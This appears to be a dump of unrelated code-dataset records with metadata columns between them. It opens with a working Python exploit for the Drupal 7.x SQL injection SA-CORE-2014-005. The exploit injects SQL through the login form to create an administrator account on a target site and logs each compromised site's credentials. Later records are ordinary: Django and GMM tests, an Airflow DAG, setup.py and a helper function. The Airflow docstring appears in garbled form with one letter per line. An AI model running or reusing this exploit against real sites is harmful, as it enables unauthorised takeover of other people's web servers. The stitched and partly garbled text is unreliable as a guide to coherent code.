output += itoa64[(value >> 12) & 0x3f]
if i >= count:
break
i += 1
output += itoa64[(value >> 18) & 0x3f]
if i >= count:
break
return output
def rehash(self, stored_hash, password):
# Drupal 6 compatibility
if len(stored_hash) == 32 and stored_hash.find('$') == -1:
return hashlib.md5(password).hexdigest()
# Drupal 7
if stored_hash[0:2] == 'U$':
stored_hash = stored_hash[1:]
password = hashlib.md5(password).hexdigest()
hash_type = stored_hash[0:3]
if hash_type == '$S$':
hash_str = self.password_crypt('sha512', password, stored_hash)
elif hash_type == '$H$' or hash_type == '$P$':
hash_str = self.password_crypt('md5', password, stored_hash)
else:
hash_str = False
return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
def randomAgentGen():
userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
UA = random.choice(userAgent)
return UA
def urldrupal(url):
try:
if url[:8] != "https://" and url[:7] != "http://":
sys.exit(1)
# Page login
url = url+'/?q=node&destination=node'
return url
except:
pass
commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
action="store",
help="Insert URL: http[s]://www.victim.com",
)
commandList.add_option('-u', '--username',
action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd',
action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.username or not options.pwd:
sys.exit(1)
host = options.target
user = options.username
password = <PASSWORD>
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = urldrupal(host)
# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK<PASSWORD>X7B/M8<PASSWORD>E1Tp/kMO<PASSWORD>AZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=<PASSWORD>&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
UA = randomAgentGen()
try:
req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
content = urllib2.urlopen(req).read()
if "mb_strlen() expects parameter 1" in content:
print c + ' [' + y + '+' + c + '] ' + y + 'Drupal Add admin' + g + ' [Vuln!!]'
with open('result/AdminTakeoverDrupal_results.txt', 'a') as writer:
writer.write(str(target).split('/')[2] + '/user/login' + '\n' + 'username: ' + str(user) + '\n'
+ 'password: ' + str(password) + '\n')
else:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.HTTPError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except urllib2.URLError as e:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
except:
print c + ' [' + y + '-' + c + '] ' + r + str(target).split('/')[2] + ' ' + y +\
'Drupal Add admin' + c + ' [Not Vuln]'
|
en
| 0.623644
|
#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, # or damages caused by some other,creative application of this material. # In any case you disagree with the above statement,stop here. # START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py # Calculate a non-truncated Drupal 7 compatible password hash. # The consumer of these hashes must truncate correctly. # Drupal 6 compatibility # Drupal 7 # END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py # Page login # Check args # Add new user: # insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK<PASSWORD>X7B/M8<PASSWORD>E1Tp/kMO<PASSWORD>AZld' FROM users # # Set administrator permission (rid = 3): # insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3) # #%20%20]=test3&name[0]=test&pass=<PASSWORD>&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
| 2.212212
| 2
|
api/tests/test_views.py
|
pythonsway/library-manager
| 0
|
6628463
|
from datetime import datetime
from django.urls import reverse
from rest_framework.test import APITestCase
from catalog.models import Author, Book, Language
class BookListApiTest(APITestCase):
    """API-level tests for the book list endpoint."""

    def setUp(self):
        """Create one Book with an author and a language for the list view."""
        title = 'Django? Is that Spanish?'
        author = Author.objects.create(name='<NAME>')
        pub_date = datetime(2010, 5, 17)
        isbn = 1111111111111
        pages_num = 999
        language = Language.objects.create(name='English', code='en')
        # Keep the created instance instead of refetching it with a
        # hardcoded primary key: Book.objects.get(id=1) breaks whenever the
        # test database does not start ids at 1 (e.g. with --keepdb).
        book = Book.objects.create(
            title=title,
            pub_date=pub_date,
            isbn=isbn,
            pages_num=pages_num,
            language=language)
        book.authors.add(author)

    def test_api_url_exists_at_desired_location(self):
        """The endpoint responds 200 at its hardcoded path."""
        response = self.client.get('/api/')
        self.assertEqual(response.status_code, 200)

    def test_view_url_accessible_by_name(self):
        """The endpoint responds 200 via its reversed URL name."""
        url = reverse('api-books')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
|
from datetime import datetime
from django.urls import reverse
from rest_framework.test import APITestCase
from catalog.models import Author, Book, Language
class BookListApiTest(APITestCase):
def setUp(self):
title = 'Django? Is that Spanish?'
author = Author.objects.create(name='<NAME>')
pub_date = datetime(2010, 5, 17)
isbn = 1111111111111
pages_num = 999
language = Language.objects.create(name='English', code='en')
Book.objects.create(
title=title,
pub_date=pub_date,
isbn=isbn,
pages_num=pages_num,
language=language)
Book.objects.get(id=1).authors.add(author)
def test_api_url_exists_at_desired_location(self):
response = self.client.get('/api/')
self.assertEqual(response.status_code, 200)
def test_view_url_accessible_by_name(self):
url = reverse('api-books')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
|
none
| 1
| 2.599146
| 3
|
|
starthinker_airflow/dags/dataset_dag.py
|
RMStanford/starthinker
| 0
|
6628464
|
###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
Dataset

Create and permission a dataset in BigQuery.

Specify the name of the dataset.
If the dataset exists, it is left unchanged.
Add emails and/or groups to add read permission.
CAUTION: Removing permissions in StarThinker has no effect.
CAUTION: To remove permissions you have to edit the dataset.
'''
from starthinker_airflow.factory import DAG_Factory
# Airflow connection ids: USER_CONN_ID authenticates as the end user,
# GCP_CONN_ID as a service account (empty string = factory default).
USER_CONN_ID = "google_cloud_default" # The connection to use for user authentication.
GCP_CONN_ID = "" # The connection to use for service authentication.
# Recipe parameters surfaced to whoever deploys this DAG.
INPUTS = {
  'dataset_dataset': '', # Name of Google BigQuery dataset to create.
  'dataset_emails': [], # Comma separated emails.
  'dataset_groups': [], # Comma separated groups.
}
# StarThinker task list: one "dataset" task that creates the BigQuery
# dataset and grants read access to the listed emails/groups.  Each
# 'field' dict maps a task argument to an entry in INPUTS above.
TASKS = [
  {
    'dataset': {
      'auth': 'service',
      'dataset': {
        'field': {
          'name': 'dataset_dataset',
          'kind': 'string',
          'order': 1,
          'default': '',
          'description': 'Name of Google BigQuery dataset to create.'
        }
      },
      'emails': {
        'field': {
          'name': 'dataset_emails',
          'kind': 'string_list',
          'order': 2,
          'default': [
          ],
          'description': 'Comma separated emails.'
        }
      },
      'groups': {
        'field': {
          'name': 'dataset_groups',
          'kind': 'string_list',
          'order': 3,
          'default': [
          ],
          'description': 'Comma separated groups.'
        }
      }
    }
  }
]
# Build the Airflow DAG object from the recipe above.
DAG_FACTORY = DAG_Factory('dataset', { 'tasks':TASKS }, INPUTS)
# NOTE: "apply_credentails" is the factory's actual (misspelled) method name.
DAG_FACTORY.apply_credentails(USER_CONN_ID, GCP_CONN_ID)
DAG = DAG_FACTORY.execute()
if __name__ == "__main__":
  DAG_FACTORY.print_commandline()
|
###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
Dataset
Create and permission a dataset in BigQuery.
S
p
e
c
i
f
y
t
h
e
n
a
m
e
o
f
t
h
e
d
a
t
a
s
e
t
.
I
f
d
a
t
a
s
e
t
e
x
i
s
t
s
,
i
t
i
s
i
n
c
h
a
n
g
e
d
.
A
d
d
e
m
a
i
l
s
a
n
d
/
o
r
g
r
o
u
p
s
t
o
a
d
d
r
e
a
d
p
e
r
m
i
s
s
i
o
n
.
C
A
U
T
I
O
N
:
R
e
m
o
v
i
n
g
p
e
r
m
i
s
s
i
o
n
s
i
n
S
t
a
r
T
h
i
n
k
e
r
h
a
s
n
o
e
f
f
e
c
t
.
C
A
U
T
I
O
N
:
T
o
r
e
m
o
v
e
p
e
r
m
i
s
s
i
o
n
s
y
o
u
h
a
v
e
t
o
e
d
i
t
t
h
e
d
a
t
a
s
e
t
.
'''
from starthinker_airflow.factory import DAG_Factory
USER_CONN_ID = "google_cloud_default" # The connection to use for user authentication.
GCP_CONN_ID = "" # The connection to use for service authentication.
INPUTS = {
'dataset_dataset': '', # Name of Google BigQuery dataset to create.
'dataset_emails': [], # Comma separated emails.
'dataset_groups': [], # Comma separated groups.
}
TASKS = [
{
'dataset': {
'auth': 'service',
'dataset': {
'field': {
'name': 'dataset_dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'Name of Google BigQuery dataset to create.'
}
},
'emails': {
'field': {
'name': 'dataset_emails',
'kind': 'string_list',
'order': 2,
'default': [
],
'description': 'Comma separated emails.'
}
},
'groups': {
'field': {
'name': 'dataset_groups',
'kind': 'string_list',
'order': 3,
'default': [
],
'description': 'Comma separated groups.'
}
}
}
}
]
DAG_FACTORY = DAG_Factory('dataset', { 'tasks':TASKS }, INPUTS)
DAG_FACTORY.apply_credentails(USER_CONN_ID, GCP_CONN_ID)
DAG = DAG_FACTORY.execute()
if __name__ == "__main__":
DAG_FACTORY.print_commandline()
|
en
| 0.595092
|
########################################################################### # # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ########################################################################### Dataset Create and permission a dataset in BigQuery. S p e c i f y t h e n a m e o f t h e d a t a s e t . I f d a t a s e t e x i s t s , i t i s i n c h a n g e d . A d d e m a i l s a n d / o r g r o u p s t o a d d r e a d p e r m i s s i o n . C A U T I O N : R e m o v i n g p e r m i s s i o n s i n S t a r T h i n k e r h a s n o e f f e c t . C A U T I O N : T o r e m o v e p e r m i s s i o n s y o u h a v e t o e d i t t h e d a t a s e t . # The connection to use for user authentication. # The connection to use for service authentication. # Name of Google BigQuery dataset to create. # Comma separated emails. # Comma separated groups.
| 1.508122
| 2
|
registration/urls.py
|
Yar59/vshaurme
| 1
|
6628465
|
<reponame>Yar59/vshaurme
from django.conf.urls import include, url
from . import views as signup
from django.contrib.auth import views
# URL routes for the registration app: local signup view plus the stock
# django.contrib.auth login/logout views.
# NOTE(review): views.login / views.logout are the function-based auth views
# that were removed in Django 2.1 -- confirm the pinned Django version still
# provides them (class-based LoginView/LogoutView are the replacements).
urlpatterns = [
    url(r'^accounts/signup/$', signup.user_new, name='signup'),
    url(r'^accounts/login/$', views.login, name='login'),
    url(r'^accounts/logout/$', views.logout, name='logout', kwargs={'next_page': '/'}),
]
|
from django.conf.urls import include, url
from . import views as signup
from django.contrib.auth import views
urlpatterns = [
url(r'^accounts/signup/$', signup.user_new, name='signup'),
url(r'^accounts/login/$', views.login, name='login'),
url(r'^accounts/logout/$', views.logout, name='logout', kwargs={'next_page': '/'}),
]
|
none
| 1
| 1.782824
| 2
|
|
gmm/tests/test_GMM.py
|
meyer-lab/tensor-gmm
| 0
|
6628466
|
<filename>gmm/tests/test_GMM.py<gh_stars>0
"""
Test the data import.
"""
import pandas as pd
import numpy as np
from ..imports import smallDF
from ..GMM import cvGMM
from ..scImport import import_thompson_drug
from ..tensor import vector_to_cp_pt, comparingGMM, comparingGMMjax, vector_guess, maxloglik_ptnnp, minimize_func, tensorGMM_CV, covFactor_to_precisions
# Shared fixtures loaded once at import time so every test reuses them:
# a small data tensor (10 cells per condition) plus auxiliary metadata.
data_import, other_import = smallDF(10)
# Shape tuple handed to vector_guess: leading 6 presumably the cluster
# count, the rest taken from data_import's axes -- TODO confirm axis meanings.
meanShape = (6, data_import.shape[0], data_import.shape[2], data_import.shape[3], data_import.shape[4])
def test_cvGMM():
    """cvGMM runs on the shared fixture and returns its results as a DataFrame."""
    gmmDF = cvGMM(data_import, 4, other_import[1])
    assert isinstance(gmmDF, pd.DataFrame)
def test_import():
    """Requesting twice the cell count scales only the cell axis of the tensor."""
    doubled, _ = smallDF(data_import.shape[1] * 2)
    expected = list(data_import.shape)
    expected[1] *= 2  # axis 1 is the cell axis; all others stay fixed
    assert list(doubled.shape) == expected
def test_sc():
    """Smoke test: the single-cell drug data import runs without raising."""
    x, _ = import_thompson_drug()
def test_cov_to_prec():
    """Precision factors built from a random covariance guess are all finite."""
    x0 = vector_guess(meanShape, rank=3)
    _, _, covFac = vector_to_cp_pt(x0, 3, meanShape)
    precBuild = covFactor_to_precisions(covFac)
    assert np.all(np.isfinite(precBuild))
def test_CP_to_vec():
"""Test that we can go from Cp to vector, and from vector to Cp without changing values."""
x0 = vector_guess(meanShape, rank=3)
built = vector_to_cp_pt(x0, 3, meanShape)
# Check that we can get a likelihood
ll = maxloglik_ptnnp(x0, meanShape, 3, data_import.to_numpy())
assert np.isfinite(ll)
def test_comparingGMM():
"""Test that we can ensures log likelihood is calculated the same"""
x0 = vector_guess(meanShape, rank=3)
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
optimized1 = comparingGMM(data_import, meanFact, precBuild, nk)
optimized2 = comparingGMMjax(data_import.to_numpy(), nk, meanFact, precBuild)
np.testing.assert_allclose(optimized1, optimized2, rtol=1e-5)
def test_independence():
"""Test that conditions can be separately evaluated as expected."""
x0 = vector_guess(meanShape, rank=3)
data_numpy = data_import.to_numpy()
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
ll1 = comparingGMM(data_import, meanFact, precBuild, nk)
ll2 = comparingGMMjax(data_numpy, nk, meanFact, precBuild)
np.testing.assert_allclose(ll1, ll2, rtol=1e-5)
# Test that cells are independent
ll3 = comparingGMMjax(data_numpy[:, :5, :, :, :], nk, meanFact, precBuild)
ll3 += comparingGMMjax(data_numpy[:, 5:, :, :, :], nk, meanFact, precBuild)
np.testing.assert_allclose(ll2, ll3, rtol=1e-5)
# Test that ligands are independent
# meanFactOne = deepcopy(meanFact)
# meanFactOne[4] = meanFact[4][:5, :]
# ptFactOne = deepcopy(ptFact)
# ptFactOne[4] = ptFact[4][:5, :]
# ll4 = comparingGMMjax(data_numpy[:, :, :, :, :5], nk, meanFactOne, ptFactOne)
# meanFactTwo = deepcopy(meanFact)
# meanFactTwo[4] = meanFact[4][5:, :]
# ptFactTwo = deepcopy(ptFact)
# ptFactTwo[4] = ptFact[4][5:, :]
# ll4 += comparingGMMjax(data_numpy[:, :, :, :, 5:], nk, meanFactTwo, ptFactTwo)
# np.testing.assert_allclose(ll2, ll4, rtol=1e-5)
def test_fit():
"""Test that fitting can run fine."""
nk, fac, ptfac, ll, _, _ = minimize_func(data_import, 3, 10, maxiter=20)
loglik = tensorGMM_CV(data_import, numFolds=3, numClusters=3, numRank=2, maxiter=20)
assert isinstance(loglik, float)
assert isinstance(ll, float)
|
<filename>gmm/tests/test_GMM.py<gh_stars>0
"""
Test the data import.
"""
import pandas as pd
import numpy as np
from ..imports import smallDF
from ..GMM import cvGMM
from ..scImport import import_thompson_drug
from ..tensor import vector_to_cp_pt, comparingGMM, comparingGMMjax, vector_guess, maxloglik_ptnnp, minimize_func, tensorGMM_CV, covFactor_to_precisions
data_import, other_import = smallDF(10)
meanShape = (6, data_import.shape[0], data_import.shape[2], data_import.shape[3], data_import.shape[4])
def test_cvGMM():
"""Stub test."""
gmmDF = cvGMM(data_import, 4, other_import[1])
assert isinstance(gmmDF, pd.DataFrame)
def test_import():
"""Stub test."""
dataTwo, _ = smallDF(data_import.shape[1] * 2)
assert data_import.shape[0] == dataTwo.shape[0]
assert 2 * data_import.shape[1] == dataTwo.shape[1]
assert data_import.shape[2] == dataTwo.shape[2]
assert data_import.shape[3] == dataTwo.shape[3]
assert data_import.shape[4] == dataTwo.shape[4]
def test_sc():
x, _ = import_thompson_drug()
def test_cov_to_prec():
"""Test that we can go from Cp to vector, and from vector to Cp without changing values."""
x0 = vector_guess(meanShape, rank=3)
_, _, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
assert np.all(np.isfinite(precBuild))
def test_CP_to_vec():
"""Test that we can go from Cp to vector, and from vector to Cp without changing values."""
x0 = vector_guess(meanShape, rank=3)
built = vector_to_cp_pt(x0, 3, meanShape)
# Check that we can get a likelihood
ll = maxloglik_ptnnp(x0, meanShape, 3, data_import.to_numpy())
assert np.isfinite(ll)
def test_comparingGMM():
"""Test that we can ensures log likelihood is calculated the same"""
x0 = vector_guess(meanShape, rank=3)
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
optimized1 = comparingGMM(data_import, meanFact, precBuild, nk)
optimized2 = comparingGMMjax(data_import.to_numpy(), nk, meanFact, precBuild)
np.testing.assert_allclose(optimized1, optimized2, rtol=1e-5)
def test_independence():
"""Test that conditions can be separately evaluated as expected."""
x0 = vector_guess(meanShape, rank=3)
data_numpy = data_import.to_numpy()
nk, meanFact, covFac = vector_to_cp_pt(x0, 3, meanShape)
precBuild = covFactor_to_precisions(covFac)
ll1 = comparingGMM(data_import, meanFact, precBuild, nk)
ll2 = comparingGMMjax(data_numpy, nk, meanFact, precBuild)
np.testing.assert_allclose(ll1, ll2, rtol=1e-5)
# Test that cells are independent
ll3 = comparingGMMjax(data_numpy[:, :5, :, :, :], nk, meanFact, precBuild)
ll3 += comparingGMMjax(data_numpy[:, 5:, :, :, :], nk, meanFact, precBuild)
np.testing.assert_allclose(ll2, ll3, rtol=1e-5)
# Test that ligands are independent
# meanFactOne = deepcopy(meanFact)
# meanFactOne[4] = meanFact[4][:5, :]
# ptFactOne = deepcopy(ptFact)
# ptFactOne[4] = ptFact[4][:5, :]
# ll4 = comparingGMMjax(data_numpy[:, :, :, :, :5], nk, meanFactOne, ptFactOne)
# meanFactTwo = deepcopy(meanFact)
# meanFactTwo[4] = meanFact[4][5:, :]
# ptFactTwo = deepcopy(ptFact)
# ptFactTwo[4] = ptFact[4][5:, :]
# ll4 += comparingGMMjax(data_numpy[:, :, :, :, 5:], nk, meanFactTwo, ptFactTwo)
# np.testing.assert_allclose(ll2, ll4, rtol=1e-5)
def test_fit():
"""Test that fitting can run fine."""
nk, fac, ptfac, ll, _, _ = minimize_func(data_import, 3, 10, maxiter=20)
loglik = tensorGMM_CV(data_import, numFolds=3, numClusters=3, numRank=2, maxiter=20)
assert isinstance(loglik, float)
assert isinstance(ll, float)
|
en
| 0.803833
|
Test the data import. Stub test. Stub test. Test that we can go from Cp to vector, and from vector to Cp without changing values. Test that we can go from Cp to vector, and from vector to Cp without changing values. # Check that we can get a likelihood Test that we can ensures log likelihood is calculated the same Test that conditions can be separately evaluated as expected. # Test that cells are independent # Test that ligands are independent # meanFactOne = deepcopy(meanFact) # meanFactOne[4] = meanFact[4][:5, :] # ptFactOne = deepcopy(ptFact) # ptFactOne[4] = ptFact[4][:5, :] # ll4 = comparingGMMjax(data_numpy[:, :, :, :, :5], nk, meanFactOne, ptFactOne) # meanFactTwo = deepcopy(meanFact) # meanFactTwo[4] = meanFact[4][5:, :] # ptFactTwo = deepcopy(ptFact) # ptFactTwo[4] = ptFact[4][5:, :] # ll4 += comparingGMMjax(data_numpy[:, :, :, :, 5:], nk, meanFactTwo, ptFactTwo) # np.testing.assert_allclose(ll2, ll4, rtol=1e-5) Test that fitting can run fine.
| 2.313782
| 2
|
REQreate/_api.py
|
michellqueiroz-ua/instance-generator
| 1
|
6628467
|
<filename>REQreate/_api.py
from generator_lines_mq_with_osmnx import retrieve_network
from passenger_requests import generate_requests
|
<filename>REQreate/_api.py
from generator_lines_mq_with_osmnx import retrieve_network
from passenger_requests import generate_requests
|
none
| 1
| 1.228959
| 1
|
|
setup.py
|
zapp-oz/AutoGit
| 0
|
6628468
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="reinit",
version="0.0.2",
author="<NAME>",
author_email="<EMAIL>",
description="To re-initialize and push any github repository to your own github.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/zapp-oz/AutoGit",
packages=['reinit'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=['pygit2==1.3.0', 'requests == 2.24.0'],
python_requires='>=3.6',
entry_points={
'console_scripts':[
'reinit=reinit.app:main'
]
}
)
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="reinit",
version="0.0.2",
author="<NAME>",
author_email="<EMAIL>",
description="To re-initialize and push any github repository to your own github.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/zapp-oz/AutoGit",
packages=['reinit'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=['pygit2==1.3.0', 'requests == 2.24.0'],
python_requires='>=3.6',
entry_points={
'console_scripts':[
'reinit=reinit.app:main'
]
}
)
|
none
| 1
| 1.62611
| 2
|
|
virtual/bin/django-admin.py
|
greatdaniels/awwards-app
| 0
|
6628469
|
#!/home/dannyboy/Documents/python/django/projects/awwards-app/virtual/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
#!/home/dannyboy/Documents/python/django/projects/awwards-app/virtual/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
en
| 0.475228
|
#!/home/dannyboy/Documents/python/django/projects/awwards-app/virtual/bin/python
| 0.967866
| 1
|
python-libs/behavior.py
|
massimo-nocentini/competitive-programming
| 2
|
6628470
|
<reponame>massimo-nocentini/competitive-programming
def dispatch(*args, table, default=lambda k, e: k):
'''
Dispatch behavior in *even* positions within `args` against mapping `table`.
It accepts a variable list of arguments, however of even length, where
*hashable* objects in *even* positions are used in the key for dispatching against
logic container `table`, namely a mapping of functions; in parallel, objects
in *odd* positions within `args` are used as values, respectively.
Keyword argument `default` is a function that consumes two arguments:
the former is the key not found in the dispatch `table`; the latter one
is the caught exception, if re-raising would be performed. Its default
behavior is to return the key as it is.
'''
key = tuple([args[e] for e in range(0, len(args), 2)])
values = [args[o] for o in range(1, len(args), 2)]
try:
method = table[key]
return method(*values)
except KeyError as e:
return default(key, e)
|
def dispatch(*args, table, default=lambda k, e: k):
'''
Dispatch behavior in *even* positions within `args` against mapping `table`.
It accepts a variable list of arguments, however of even length, where
*hashable* objects in *even* positions are used in the key for dispatching against
logic container `table`, namely a mapping of functions; in parallel, objects
in *odd* positions within `args` are used as values, respectively.
Keyword argument `default` is a function that consumes two arguments:
